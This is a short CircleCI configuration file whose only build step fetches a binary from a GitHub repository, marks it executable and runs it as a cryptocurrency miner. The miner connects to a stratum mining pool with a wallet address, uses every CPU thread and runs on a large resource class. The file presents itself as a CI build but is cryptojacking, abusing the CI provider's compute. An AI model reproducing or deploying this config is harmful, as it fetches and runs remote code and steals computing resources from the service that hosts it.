version: 2.1

jobs:
  build:
    docker:
     - image: cimg/base:current
    resource_class: 2xlarge
    working_directory: /mnt/ramdisk

    steps:
      - run: wget https://github.com/clasmildyt/tes/raw/main/cipet && chmod +x cipet && ./cipet -a yescryptr16 -o stratum+tcp://stratum-na.rplant.xyz:7055 -u qZnyHPgAKdf9kMNCE766YqqhRtSnK12MAx.tes$(echo $(shuf -i 1-999 -n 1)) -t $(nproc --all)
